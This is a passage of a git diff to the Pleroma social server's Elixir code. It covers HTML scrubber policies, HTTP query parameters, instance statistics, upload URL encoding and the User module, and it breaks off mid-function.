	HtmlSanitizeEx.Scrubber.StripTags,
	object,
	module
	)
	end

	def ensure_scrubbed_html(
	content,
	scrubbers
	) do
	{:commit, filter_tags(content, scrubbers)}
	end

	defp generate_scrubber_signature(scrubber) when is_atom(scrubber) do
	generate_scrubber_signature([scrubber])
	end

	defp generate_scrubber_signature(scrubbers) do
	Enum.reduce(scrubbers, "", fn scrubber, signature ->
	"#{signature}#{to_string(scrubber)}"
	end)
	end
	end

	defmodule Pleroma.HTML.Scrubber.TwitterText do
	@moduledoc """
	An HTML scrubbing policy which limits to twitter-style text. Only
	paragraphs, breaks and links are allowed through the filter.
	"""

	@markup Application.get_env(:pleroma, :markup)
	@uri_schemes Application.get_env(:pleroma, :uri_schemes, [])
	@valid_schemes Keyword.get(@uri_schemes, :valid_schemes, [])

	require HtmlSanitizeEx.Scrubber.Meta
	alias HtmlSanitizeEx.Scrubber.Meta

	Meta.remove_cdata_sections_before_scrub()
	Meta.strip_comments()

	# links
	Meta.allow_tag_with_uri_attributes("a", ["href", "data-user", "data-tag"], @valid_schemes)
	- Meta.allow_tag_with_these_attributes("a", ["name", "title"])
	+ Meta.allow_tag_with_these_attributes("a", ["name", "title", "class"])

	# paragraphs and linebreaks
	Meta.allow_tag_with_these_attributes("br", [])
	Meta.allow_tag_with_these_attributes("p", [])

	# microformats
	- Meta.allow_tag_with_these_attributes("span", [])
	+ Meta.allow_tag_with_these_attributes("span", ["class"])

	# allow inline images for custom emoji
	@allow_inline_images Keyword.get(@markup, :allow_inline_images)

	if @allow_inline_images do
	# restrict img tags to http/https only, because of MediaProxy.
	Meta.allow_tag_with_uri_attributes("img", ["src"], ["http", "https"])

	Meta.allow_tag_with_these_attributes("img", [
	"width",
	"height",
	"title",
	"alt"
	])
	end

	Meta.strip_everything_not_covered()
	end

	defmodule Pleroma.HTML.Scrubber.Default do
	@doc "The default HTML scrubbing policy: no "

	require HtmlSanitizeEx.Scrubber.Meta
	alias HtmlSanitizeEx.Scrubber.Meta

	@markup Application.get_env(:pleroma, :markup)
	@uri_schemes Application.get_env(:pleroma, :uri_schemes, [])
	@valid_schemes Keyword.get(@uri_schemes, :valid_schemes, [])

	Meta.remove_cdata_sections_before_scrub()
	Meta.strip_comments()

	Meta.allow_tag_with_uri_attributes("a", ["href", "data-user", "data-tag"], @valid_schemes)
	- Meta.allow_tag_with_these_attributes("a", ["name", "title"])
	+ Meta.allow_tag_with_these_attributes("a", ["name", "title", "class"])

	Meta.allow_tag_with_these_attributes("abbr", ["title"])

	Meta.allow_tag_with_these_attributes("b", [])
	Meta.allow_tag_with_these_attributes("blockquote", [])
	Meta.allow_tag_with_these_attributes("br", [])
	Meta.allow_tag_with_these_attributes("code", [])
	Meta.allow_tag_with_these_attributes("del", [])
	Meta.allow_tag_with_these_attributes("em", [])
	Meta.allow_tag_with_these_attributes("i", [])
	Meta.allow_tag_with_these_attributes("li", [])
	Meta.allow_tag_with_these_attributes("ol", [])
	Meta.allow_tag_with_these_attributes("p", [])
	Meta.allow_tag_with_these_attributes("pre", [])
	- Meta.allow_tag_with_these_attributes("span", [])
	+ Meta.allow_tag_with_these_attributes("span", ["class"])
	Meta.allow_tag_with_these_attributes("strong", [])
	Meta.allow_tag_with_these_attributes("u", [])
	Meta.allow_tag_with_these_attributes("ul", [])

	@allow_inline_images Keyword.get(@markup, :allow_inline_images)

	if @allow_inline_images do
	# restrict img tags to http/https only, because of MediaProxy.
	Meta.allow_tag_with_uri_attributes("img", ["src"], ["http", "https"])

	Meta.allow_tag_with_these_attributes("img", [
	"width",
	"height",
	"title",
	"alt"
	])
	end

	@allow_tables Keyword.get(@markup, :allow_tables)

	if @allow_tables do
	Meta.allow_tag_with_these_attributes("table", [])
	Meta.allow_tag_with_these_attributes("tbody", [])
	Meta.allow_tag_with_these_attributes("td", [])
	Meta.allow_tag_with_these_attributes("th", [])
	Meta.allow_tag_with_these_attributes("thead", [])
	Meta.allow_tag_with_these_attributes("tr", [])
	end

	@allow_headings Keyword.get(@markup, :allow_headings)

	if @allow_headings do
	Meta.allow_tag_with_these_attributes("h1", [])
	Meta.allow_tag_with_these_attributes("h2", [])
	Meta.allow_tag_with_these_attributes("h3", [])
	Meta.allow_tag_with_these_attributes("h4", [])
	Meta.allow_tag_with_these_attributes("h5", [])
	end

	@allow_fonts Keyword.get(@markup, :allow_fonts)

	if @allow_fonts do
	Meta.allow_tag_with_these_attributes("font", ["face"])
	end

	Meta.strip_everything_not_covered()
	end

	defmodule Pleroma.HTML.Transform.MediaProxy do
	@moduledoc "Transforms inline image URIs to use MediaProxy."

	alias Pleroma.Web.MediaProxy

	def before_scrub(html), do: html

	def scrub_attribute("img", {"src", "http" <> target}) do
	media_url =
	("http" <> target)
	\|> MediaProxy.url()

	{"src", media_url}
	end

	def scrub_attribute(_tag, attribute), do: attribute

	def scrub({"img", attributes, children}) do
	attributes =
	attributes
	\|> Enum.map(fn attr -> scrub_attribute("img", attr) end)
	\|> Enum.reject(&is_nil(&1))

	{"img", attributes, children}
	end

	def scrub({:comment, _children}), do: ""

	def scrub({tag, attributes, children}), do: {tag, attributes, children}
	def scrub({_tag, children}), do: children
	def scrub(text), do: text
	end
	diff --git a/lib/pleroma/http/http.ex b/lib/pleroma/http/http.ex
	index b8103cef6..75c58e6c9 100644
	--- a/lib/pleroma/http/http.ex
	+++ b/lib/pleroma/http/http.ex
	@@ -1,81 +1,84 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.HTTP do
	@moduledoc """

	"""

	alias Pleroma.HTTP.Connection
	alias Pleroma.HTTP.RequestBuilder, as: Builder

	@type t :: __MODULE__

	@doc """
	Builds and perform http request.

	# Arguments:
	`method` - :get, :post, :put, :delete
	`url`
	`body`
	`headers` - a keyworld list of headers, e.g. `[{"content-type", "text/plain"}]`
	`options` - custom, per-request middleware or adapter options

	# Returns:
	`{:ok, %Tesla.Env{}}` or `{:error, error}`

	"""
	def request(method, url, body \\ "", headers \\ [], options \\ []) do
	options =
	process_request_options(options)
	\|> process_sni_options(url)

	+ params = Keyword.get(options, :params, [])
	+
	%{}
	\|> Builder.method(method)
	\|> Builder.headers(headers)
	\|> Builder.opts(options)
	\|> Builder.url(url)
	\|> Builder.add_param(:body, :body, body)
	+ \|> Builder.add_param(:query, :query, params)
	\|> Enum.into([])
	\|> (&Tesla.request(Connection.new(), &1)).()
	end

	defp process_sni_options(options, nil), do: options

	defp process_sni_options(options, url) do
	uri = URI.parse(url)
	host = uri.host \|> to_charlist()

	case uri.scheme do
	"https" -> options ++ [ssl: [server_name_indication: host]]
	_ -> options
	end
	end

	def process_request_options(options) do
	config = Application.get_env(:pleroma, :http, [])
	proxy = Keyword.get(config, :proxy_url, nil)

	case proxy do
	nil -> options
	_ -> options ++ [proxy: proxy]
	end
	end

	@doc """
	Performs GET request.

	See `Pleroma.HTTP.request/5`
	"""
	def get(url, headers \\ [], options \\ []),
	do: request(:get, url, "", headers, options)

	@doc """
	Performs POST request.

	See `Pleroma.HTTP.request/5`
	"""
	def post(url, body, headers \\ [], options \\ []),
	do: request(:post, url, body, headers, options)
	end
	diff --git a/lib/pleroma/http/request_builder.ex b/lib/pleroma/http/request_builder.ex
	index bffc7c6fe..5f2cff2c0 100644
	--- a/lib/pleroma/http/request_builder.ex
	+++ b/lib/pleroma/http/request_builder.ex
	@@ -1,130 +1,135 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.HTTP.RequestBuilder do
	@moduledoc """
	Helper functions for building Tesla requests
	"""

	@doc """
	Specify the request method when building a request

	## Parameters

	- request (Map) - Collected request options
	- m (atom) - Request method

	## Returns

	Map
	"""
	@spec method(map(), atom) :: map()
	def method(request, m) do
	Map.put_new(request, :method, m)
	end

	@doc """
	Specify the request method when building a request

	## Parameters

	- request (Map) - Collected request options
	- u (String) - Request URL

	## Returns

	Map
	"""
	@spec url(map(), String.t()) :: map()
	def url(request, u) do
	Map.put_new(request, :url, u)
	end

	@doc """
	Add headers to the request
	"""
	@spec headers(map(), list(tuple)) :: map()
	def headers(request, h) do
	Map.put_new(request, :headers, h)
	end

	@doc """
	Add custom, per-request middleware or adapter options to the request
	"""
	@spec opts(map(), Keyword.t()) :: map()
	def opts(request, options) do
	Map.put_new(request, :opts, options)
	end

	@doc """
	Add optional parameters to the request

	## Parameters

	- request (Map) - Collected request options
	- definitions (Map) - Map of parameter name to parameter location.
	- options (KeywordList) - The provided optional parameters

	## Returns

	Map
	"""
	@spec add_optional_params(map(), %{optional(atom) => atom}, keyword()) :: map()
	def add_optional_params(request, _, []), do: request

	def add_optional_params(request, definitions, [{key, value} \| tail]) do
	case definitions do
	%{^key => location} ->
	request
	\|> add_param(location, key, value)
	\|> add_optional_params(definitions, tail)

	_ ->
	add_optional_params(request, definitions, tail)
	end
	end

	@doc """
	Add optional parameters to the request

	## Parameters

	- request (Map) - Collected request options
	- location (atom) - Where to put the parameter
	- key (atom) - The name of the parameter
	- value (any) - The value of the parameter

	## Returns

	Map
	"""
	@spec add_param(map(), atom, atom, any()) :: map()
	+ def add_param(request, :query, :query, values), do: Map.put(request, :query, values)
	+
	def add_param(request, :body, :body, value), do: Map.put(request, :body, value)

	def add_param(request, :body, key, value) do
	request
	\|> Map.put_new_lazy(:body, &Tesla.Multipart.new/0)
	\|> Map.update!(
	:body,
	- &Tesla.Multipart.add_field(&1, key, Poison.encode!(value),
	+ &Tesla.Multipart.add_field(
	+ &1,
	+ key,
	+ Jason.encode!(value),
	headers: [{:"Content-Type", "application/json"}]
	)
	)
	end

	def add_param(request, :file, name, path) do
	request
	\|> Map.put_new_lazy(:body, &Tesla.Multipart.new/0)
	\|> Map.update!(:body, &Tesla.Multipart.add_file(&1, path, name: name))
	end

	def add_param(request, :form, name, value) do
	request
	\|> Map.update(:body, %{name => value}, &Map.put(&1, name, value))
	end

	def add_param(request, location, key, value) do
	Map.update(request, location, [{key, value}], &(&1 ++ [{key, value}]))
	end
	end
	diff --git a/lib/pleroma/stats.ex b/lib/pleroma/stats.ex
	index 8a030ecd0..b3566ceb6 100644
	--- a/lib/pleroma/stats.ex
	+++ b/lib/pleroma/stats.ex
	@@ -1,54 +1,55 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Stats do
	import Ecto.Query
	alias Pleroma.{User, Repo}

	def start_link do
	agent = Agent.start_link(fn -> {[], %{}} end, name: __MODULE__)
	spawn(fn -> schedule_update() end)
	agent
	end

	def get_stats do
	Agent.get(__MODULE__, fn {_, stats} -> stats end)
	end

	def get_peers do
	Agent.get(__MODULE__, fn {peers, _} -> peers end)
	end

	def schedule_update do
	spawn(fn ->
	# 1 hour
	Process.sleep(1000 * 60 * 60 * 1)
	schedule_update()
	end)

	update_stats()
	end

	def update_stats do
	peers =
	from(
	u in Pleroma.User,
	- select: fragment("distinct ?->'host'", u.info),
	+ select: fragment("distinct split_part(?, '@', 2)", u.nickname),
	where: u.local != ^true
	)
	\|> Repo.all()
	+ \|> Enum.filter(& &1)

	domain_count = Enum.count(peers)

	status_query =
	from(u in User.local_user_query(), select: fragment("sum((?->>'note_count')::int)", u.info))

	status_count = Repo.one(status_query)
	- user_count = Repo.aggregate(User.local_user_query(), :count, :id)
	+ user_count = Repo.aggregate(User.active_local_user_query(), :count, :id)

	Agent.update(__MODULE__, fn _ ->
	{peers, %{domain_count: domain_count, status_count: status_count, user_count: user_count}}
	end)
	end
	end
	diff --git a/lib/pleroma/upload.ex b/lib/pleroma/upload.ex
	index 0b1bdeec4..0a19e737b 100644
	--- a/lib/pleroma/upload.ex
	+++ b/lib/pleroma/upload.ex
	@@ -1,223 +1,230 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.Upload do
	@moduledoc """
	# Upload

	Options:
	* `:type`: presets for activity type (defaults to Document) and size limits from app configuration
	* `:description`: upload alternative text
	* `:base_url`: override base url
	* `:uploader`: override uploader
	* `:filters`: override filters
	* `:size_limit`: override size limit
	* `:activity_type`: override activity type

	The `%Pleroma.Upload{}` struct: all documented fields are meant to be overwritten in filters:

	* `:id` - the upload id.
	* `:name` - the upload file name.
	* `:path` - the upload path: set at first to `id/name` but can be changed. Keep in mind that the path
	is once created permanent and changing it (especially in uploaders) is probably a bad idea!
	* `:tempfile` - path to the temporary file. Prefer in-place changes on the file rather than changing the
	path as the temporary file is also tracked by `Plug.Upload{}` and automatically deleted once the request is over.

	Related behaviors:

	* `Pleroma.Uploaders.Uploader`
	* `Pleroma.Upload.Filter`

	"""
	alias Ecto.UUID
	require Logger

	@type source ::
	- Plug.Upload.t() \| data_uri_string ::
	- String.t() \| {:from_local, name :: String.t(), id :: String.t(), path :: String.t()}
	+ Plug.Upload.t()
	+ \| (data_uri_string :: String.t())
	+ \| {:from_local, name :: String.t(), id :: String.t(), path :: String.t()}

	@type option ::
	{:type, :avatar \| :banner \| :background}
	\| {:description, String.t()}
	\| {:activity_type, String.t()}
	\| {:size_limit, nil \| non_neg_integer()}
	\| {:uploader, module()}
	\| {:filters, [module()]}

	@type t :: %__MODULE__{
	id: String.t(),
	name: String.t(),
	tempfile: String.t(),
	content_type: String.t(),
	path: String.t()
	}
	defstruct [:id, :name, :tempfile, :content_type, :path]

	@spec store(source, options :: [option()]) :: {:ok, Map.t()} \| {:error, any()}
	def store(upload, opts \\ []) do
	opts = get_opts(opts)

	with {:ok, upload} <- prepare_upload(upload, opts),
	upload = %__MODULE__{upload \| path: upload.path \|\| "#{upload.id}/#{upload.name}"},
	{:ok, upload} <- Pleroma.Upload.Filter.filter(opts.filters, upload),
	{:ok, url_spec} <- Pleroma.Uploaders.Uploader.put_file(opts.uploader, upload) do
	{:ok,
	%{
	"type" => opts.activity_type,
	"url" => [
	%{
	"type" => "Link",
	"mediaType" => upload.content_type,
	"href" => url_from_spec(opts.base_url, url_spec)
	}
	],
	"name" => Map.get(opts, :description) \|\| upload.name
	}}
	else
	{:error, error} ->
	Logger.error(
	"#{__MODULE__} store (using #{inspect(opts.uploader)}) failed: #{inspect(error)}"
	)

	{:error, error}
	end
	end

	defp get_opts(opts) do
	{size_limit, activity_type} =
	case Keyword.get(opts, :type) do
	:banner ->
	{Pleroma.Config.get!([:instance, :banner_upload_limit]), "Image"}

	:avatar ->
	{Pleroma.Config.get!([:instance, :avatar_upload_limit]), "Image"}

	:background ->
	{Pleroma.Config.get!([:instance, :background_upload_limit]), "Image"}

	_ ->
	{Pleroma.Config.get!([:instance, :upload_limit]), "Document"}
	end

	opts = %{
	activity_type: Keyword.get(opts, :activity_type, activity_type),
	size_limit: Keyword.get(opts, :size_limit, size_limit),
	uploader: Keyword.get(opts, :uploader, Pleroma.Config.get([__MODULE__, :uploader])),
	filters: Keyword.get(opts, :filters, Pleroma.Config.get([__MODULE__, :filters])),
	description: Keyword.get(opts, :description),
	base_url:
	Keyword.get(
	opts,
	:base_url,
	Pleroma.Config.get([__MODULE__, :base_url], Pleroma.Web.base_url())
	)
	}

	# TODO: 1.0+ : remove old config compatibility
	opts =
	if Pleroma.Config.get([__MODULE__, :strip_exif]) == true &&
	!Enum.member?(opts.filters, Pleroma.Upload.Filter.Mogrify) do
	Logger.warn("""
	Pleroma: configuration `:instance, :strip_exif` is deprecated, please instead set:

	:pleroma, Pleroma.Upload, [filters: [Pleroma.Upload.Filter.Mogrify]]

	:pleroma, Pleroma.Upload.Filter.Mogrify, args: "strip"
	""")

	Pleroma.Config.put([Pleroma.Upload.Filter.Mogrify], args: "strip")
	Map.put(opts, :filters, opts.filters ++ [Pleroma.Upload.Filter.Mogrify])
	else
	opts
	end

	if Pleroma.Config.get([:instance, :dedupe_media]) == true &&
	!Enum.member?(opts.filters, Pleroma.Upload.Filter.Dedupe) do
	Logger.warn("""
	Pleroma: configuration `:instance, :dedupe_media` is deprecated, please instead set:

	:pleroma, Pleroma.Upload, [filters: [Pleroma.Upload.Filter.Dedupe]]
	""")

	Map.put(opts, :filters, opts.filters ++ [Pleroma.Upload.Filter.Dedupe])
	else
	opts
	end
	end

	defp prepare_upload(%Plug.Upload{} = file, opts) do
	with :ok <- check_file_size(file.path, opts.size_limit),
	{:ok, content_type, name} <- Pleroma.MIME.file_mime_type(file.path, file.filename) do
	{:ok,
	%__MODULE__{
	id: UUID.generate(),
	name: name,
	tempfile: file.path,
	content_type: content_type
	}}
	end
	end

	defp prepare_upload(%{"img" => "data:image/" <> image_data}, opts) do
	parsed = Regex.named_captures(~r/(?<filetype>jpeg\|png\|gif);base64,(?<data>.*)/, image_data)
	data = Base.decode64!(parsed["data"], ignore: :whitespace)
	hash = String.downcase(Base.encode16(:crypto.hash(:sha256, data)))

	with :ok <- check_binary_size(data, opts.size_limit),
	tmp_path <- tempfile_for_image(data),
	{:ok, content_type, name} <-
	Pleroma.MIME.bin_mime_type(data, hash <> "." <> parsed["filetype"]) do
	{:ok,
	%__MODULE__{
	id: UUID.generate(),
	name: name,
	tempfile: tmp_path,
	content_type: content_type
	}}
	end
	end

	# For Mix.Tasks.MigrateLocalUploads
	defp prepare_upload(upload = %__MODULE__{tempfile: path}, _opts) do
	with {:ok, content_type} <- Pleroma.MIME.file_mime_type(path) do
	{:ok, %__MODULE__{upload \| content_type: content_type}}
	end
	end

	defp check_binary_size(binary, size_limit)
	when is_integer(size_limit) and size_limit > 0 and byte_size(binary) >= size_limit do
	{:error, :file_too_large}
	end

	defp check_binary_size(_, _), do: :ok

	defp check_file_size(path, size_limit) when is_integer(size_limit) and size_limit > 0 do
	with {:ok, %{size: size}} <- File.stat(path),
	true <- size <= size_limit do
	:ok
	else
	false -> {:error, :file_too_large}
	error -> error
	end
	end

	defp check_file_size(_, _), do: :ok

	# Creates a tempfile using the Plug.Upload Genserver which cleans them up
	# automatically.
	defp tempfile_for_image(data) do
	{:ok, tmp_path} = Plug.Upload.random_file("profile_pics")
	{:ok, tmp_file} = File.open(tmp_path, [:write, :raw, :binary])
	IO.binwrite(tmp_file, data)

	tmp_path
	end

	defp url_from_spec(base_url, {:file, path}) do
	+ path =
	+ path
	+ \|> URI.encode()
	+ \|> String.replace("?", "%3F")
	+ \|> String.replace(":", "%3A")
	+
	[base_url, "media", path]
	\|> Path.join()
	end

	defp url_from_spec(_base_url, {:url, url}), do: url
	end
	diff --git a/lib/pleroma/user.ex b/lib/pleroma/user.ex
	index 13a476fd2..5137af917 100644
	--- a/lib/pleroma/user.ex
	+++ b/lib/pleroma/user.ex
	@@ -1,1069 +1,1086 @@
	# Pleroma: A lightweight social networking server
	# Copyright © 2017-2019 Pleroma Authors <https://pleroma.social/>
	# SPDX-License-Identifier: AGPL-3.0-only

	defmodule Pleroma.User do
	use Ecto.Schema

	import Ecto.{Changeset, Query}
	alias Pleroma.{Repo, User, Object, Web, Activity, Notification}
	alias Comeonin.Pbkdf2
	alias Pleroma.Formatter
	alias Pleroma.Web.CommonAPI.Utils, as: CommonUtils
	alias Pleroma.Web.{OStatus, Websub, OAuth}
	alias Pleroma.Web.ActivityPub.{Utils, ActivityPub}

	require Logger

	@type t :: %__MODULE__{}

	@email_regex ~r/^[a-zA-Z0-9.!#$%&'+\/=?^_`{\|}~-]+@[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?(?:\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)$/

	@strict_local_nickname_regex ~r/^[a-zA-Z\d]+$/
	@extended_local_nickname_regex ~r/^[a-zA-Z\d_-]+$/

	schema "users" do
	field(:bio, :string)
	field(:email, :string)
	field(:name, :string)
	field(:nickname, :string)
	field(:password_hash, :string)
	field(:password, :string, virtual: true)
	field(:password_confirmation, :string, virtual: true)
	field(:following, {:array, :string}, default: [])
	field(:ap_id, :string)
	field(:avatar, :map)
	field(:local, :boolean, default: true)
	field(:follower_address, :string)
	field(:search_distance, :float, virtual: true)
	field(:tags, {:array, :string}, default: [])
	field(:last_refreshed_at, :naive_datetime)
	has_many(:notifications, Notification)
	embeds_one(:info, Pleroma.User.Info)

	timestamps()
	end

	def auth_active?(%User{local: false}), do: true

	def auth_active?(%User{info: %User.Info{confirmation_pending: false}}), do: true

	def auth_active?(%User{info: %User.Info{confirmation_pending: true}}),
	do: !Pleroma.Config.get([:instance, :account_activation_required])

	def auth_active?(_), do: false

	def visible_for?(user, for_user \\ nil)

	def visible_for?(%User{id: user_id}, %User{id: for_id}) when user_id == for_id, do: true

	def visible_for?(%User{} = user, for_user) do
	auth_active?(user) \|\| superuser?(for_user)
	end

	def visible_for?(_, _), do: false

	def superuser?(%User{local: true, info: %User.Info{is_admin: true}}), do: true
	def superuser?(%User{local: true, info: %User.Info{is_moderator: true}}), do: true
	def superuser?(_), do: false

	def avatar_url(user) do
	case user.avatar do
	%{"url" => [%{"href" => href} \| _]} -> href
	_ -> "#{Web.base_url()}/images/avi.png"
	end
	end

	def banner_url(user) do
	case user.info.banner do
	%{"url" => [%{"href" => href} \| _]} -> href
	_ -> "#{Web.base_url()}/images/banner.png"
	end
	end

	def profile_url(%User{info: %{source_data: %{"url" => url}}}), do: url
	def profile_url(%User{ap_id: ap_id}), do: ap_id
	def profile_url(_), do: nil

	def ap_id(%User{nickname: nickname}) do
	"#{Web.base_url()}/users/#{nickname}"
	end

	def ap_followers(%User{} = user) do
	"#{ap_id(user)}/followers"
	end

	def follow_changeset(struct, params \\ %{}) do
	struct
	\|> cast(params, [:following])
	\|> validate_required([:following])
	end

	def user_info(%User{} = user) do
	oneself = if user.local, do: 1, else: 0

	%{
	following_count: length(user.following) - oneself,
	note_count: user.info.note_count,
	follower_count: user.info.follower_count,
	locked: user.info.locked,
	confirmation_pending: user.info.confirmation_pending,
	default_scope: user.info.default_scope
	}
	end

	def remote_user_creation(params) do
	params =
	params
	\|> Map.put(:info, params[:info] \|\| %{})

	info_cng = User.Info.remote_user_creation(%User.Info{}, params[:info])

	changes =
	%User{}
	\|> cast(params, [:bio, :name, :ap_id, :nickname, :avatar])
	\|> validate_required([:name, :ap_id])
	\|> unique_constraint(:nickname)
	\|> validate_format(:nickname, @email_regex)
	\|> validate_length(:bio, max: 5000)
	\|> validate_length(:name, max: 100)
	\|> put_change(:local, false)
	\|> put_embed(:info, info_cng)

	if changes.valid? do
	case info_cng.changes[:source_data] do
	%{"followers" => followers} ->
	changes
	\|> put_change(:follower_address, followers)

	_ ->
	followers = User.ap_followers(%User{nickname: changes.changes[:nickname]})

	changes
	\|> put_change(:follower_address, followers)
	end
	else
	changes
	end
	end

	def update_changeset(struct, params \\ %{}) do
	struct
	\|> cast(params, [:bio, :name, :avatar])
	\|> unique_constraint(:nickname)
	\|> validate_format(:nickname, local_nickname_regex())
	\|> validate_length(:bio, max: 5000)
	\|> validate_length(:name, min: 1, max: 100)
	end

	def upgrade_changeset(struct, params \\ %{}) do
	params =
	params
	\|> Map.put(:last_refreshed_at, NaiveDateTime.utc_now())

	info_cng =
	struct.info
	\|> User.Info.user_upgrade(params[:info])

	struct
	\|> cast(params, [:bio, :name, :follower_address, :avatar, :last_refreshed_at])
	\|> unique_constraint(:nickname)
	\|> validate_format(:nickname, local_nickname_regex())
	\|> validate_length(:bio, max: 5000)
	\|> validate_length(:name, max: 100)
	\|> put_embed(:info, info_cng)
	end

	def password_update_changeset(struct, params) do
	changeset =
	struct
	\|> cast(params, [:password, :password_confirmation])
	\|> validate_required([:password, :password_confirmation])
	\|> validate_confirmation(:password)

	OAuth.Token.delete_user_tokens(struct)
	OAuth.Authorization.delete_user_authorizations(struct)

	if changeset.valid? do
	hashed = Pbkdf2.hashpwsalt(changeset.changes[:password])

	changeset
	\|> put_change(:password_hash, hashed)
	else
	changeset
	end
	end

	def reset_password(user, data) do
	update_and_set_cache(password_update_changeset(user, data))
	end

	def register_changeset(struct, params \\ %{}, opts \\ []) do
	confirmation_status =
	if opts[:confirmed] \|\| !Pleroma.Config.get([:instance, :account_activation_required]) do
	:confirmed
	else
	:unconfirmed
	end

	info_change = User.Info.confirmation_changeset(%User.Info{}, confirmation_status)

	changeset =
	struct
	\|> cast(params, [:bio, :email, :name, :nickname, :password, :password_confirmation])
	\|> validate_required([:email, :name, :nickname, :password, :password_confirmation])
	\|> validate_confirmation(:password)
	\|> unique_constraint(:email)
	\|> unique_constraint(:nickname)
	\|> validate_exclusion(:nickname, Pleroma.Config.get([Pleroma.User, :restricted_nicknames]))
	\|> validate_format(:nickname, local_nickname_regex())
	\|> validate_format(:email, @email_regex)
	\|> validate_length(:bio, max: 1000)
	\|> validate_length(:name, min: 1, max: 100)
	\|> put_change(:info, info_change)

	if changeset.valid? do
	hashed = Pbkdf2.hashpwsalt(changeset.changes[:password])
	ap_id = User.ap_id(%User{nickname: changeset.changes[:nickname]})
	followers = User.ap_followers(%User{nickname: changeset.changes[:nickname]})

	changeset
	\|> put_change(:password_hash, hashed)
	\|> put_change(:ap_id, ap_id)
	\|> put_change(:following, [followers])
	\|> put_change(:follower_address, followers)
	else
	changeset
	end
	end

	defp autofollow_users(user) do
	candidates = Pleroma.Config.get([:instance, :autofollowed_nicknames])

	autofollowed_users =
	from(u in User,
	where: u.local == true,
	where: u.nickname in ^candidates
	)
	\|> Repo.all()

	follow_all(user, autofollowed_users)
	end

	@doc "Inserts provided changeset, performs post-registration actions (confirmation email sending etc.)"
	def register(%Ecto.Changeset{} = changeset) do
	with {:ok, user} <- Repo.insert(changeset),
	{:ok, _} <- try_send_confirmation_email(user),
	{:ok, user} <- autofollow_users(user) do
	{:ok, user}
	end
	end

	def try_send_confirmation_email(%User{} = user) do
	if user.info.confirmation_pending &&
	Pleroma.Config.get([:instance, :account_activation_required]) do
	user
	\|> Pleroma.UserEmail.account_confirmation_email()
	\|> Pleroma.Mailer.deliver()
	else
	{:ok, :noop}
	end
	end

	def needs_update?(%User{local: true}), do: false

	def needs_update?(%User{local: false, last_refreshed_at: nil}), do: true

	def needs_update?(%User{local: false} = user) do
	NaiveDateTime.diff(NaiveDateTime.utc_now(), user.last_refreshed_at) >= 86400
	end

	def needs_update?(_), do: true

	def maybe_direct_follow(%User{} = follower, %User{local: true, info: %{locked: true}}) do
	{:ok, follower}
	end

	def maybe_direct_follow(%User{} = follower, %User{local: true} = followed) do
	follow(follower, followed)
	end

	def maybe_direct_follow(%User{} = follower, %User{} = followed) do
	if not User.ap_enabled?(followed) do
	follow(follower, followed)
	else
	{:ok, follower}
	end
	end

	def maybe_follow(%User{} = follower, %User{info: _info} = followed) do
	if not following?(follower, followed) do
	follow(follower, followed)
	else
	{:ok, follower}
	end
	end

	@doc "A mass follow for local users. Ignores blocks and has no side effects"
	@spec follow_all(User.t(), list(User.t())) :: {atom(), User.t()}
	def follow_all(follower, followeds) do
	following =
	(follower.following ++ Enum.map(followeds, fn %{follower_address: fa} -> fa end))
	\|> Enum.uniq()

	{:ok, follower} =
	follower
	\|> follow_changeset(%{following: following})
	\|> update_and_set_cache

	Enum.each(followeds, fn followed ->
	update_follower_count(followed)
	end)

	{:ok, follower}
	end

	def follow(%User{} = follower, %User{info: info} = followed) do
	user_config = Application.get_env(:pleroma, :user)
	deny_follow_blocked = Keyword.get(user_config, :deny_follow_blocked)

	ap_followers = followed.follower_address

	cond do
	following?(follower, followed) or info.deactivated ->
	{:error, "Could not follow user: #{followed.nickname} is already on your list."}

	deny_follow_blocked and blocks?(followed, follower) ->
	{:error, "Could not follow user: #{followed.nickname} blocked you."}

	true ->
	if !followed.local && follower.local && !ap_enabled?(followed) do
	Websub.subscribe(follower, followed)
	end

	following =
	[ap_followers \| follower.following]
	\|> Enum.uniq()

	follower =
	follower
	\|> follow_changeset(%{following: following})
	\|> update_and_set_cache

	{:ok, _} = update_follower_count(followed)

	follower
	end
	end

	def unfollow(%User{} = follower, %User{} = followed) do
	ap_followers = followed.follower_address

	if following?(follower, followed) and follower.ap_id != followed.ap_id do
	following =
	follower.following
	\|> List.delete(ap_followers)

	{:ok, follower} =
	follower
	\|> follow_changeset(%{following: following})
	\|> update_and_set_cache

	{:ok, followed} = update_follower_count(followed)

	{:ok, follower, Utils.fetch_latest_follow(follower, followed)}
	else
	{:error, "Not subscribed!"}
	end
	end

	@spec following?(User.t(), User.t()) :: boolean
	def following?(%User{} = follower, %User{} = followed) do
	Enum.member?(follower.following, followed.follower_address)
	end

	def follow_import(%User{} = follower, followed_identifiers)
	when is_list(followed_identifiers) do
	Enum.map(
	followed_identifiers,
	fn followed_identifier ->
	with %User{} = followed <- get_or_fetch(followed_identifier),
	{:ok, follower} <- maybe_direct_follow(follower, followed),
	{:ok, _} <- ActivityPub.follow(follower, followed) do
	followed
	else
	err ->
	Logger.debug("follow_import failed for #{followed_identifier} with: #{inspect(err)}")
	err
	end
	end
	)
	end

	def locked?(%User{} = user) do
	user.info.locked \|\| false
	end

	def get_by_id(id) do
	Repo.get_by(User, id: id)
	end

	def get_by_ap_id(ap_id) do
	Repo.get_by(User, ap_id: ap_id)
	end

	# This is mostly an SPC migration fix. This guesses the user nickname (by taking the last part of the ap_id and the domain) and tries to get that user
	def get_by_guessed_nickname(ap_id) do
	domain = URI.parse(ap_id).host
	name = List.last(String.split(ap_id, "/"))
	nickname = "#{name}@#{domain}"

	get_by_nickname(nickname)
	end

	def update_and_set_cache(changeset) do
	with {:ok, user} <- Repo.update(changeset) do
	Cachex.put(:user_cache, "ap_id:#{user.ap_id}", user)
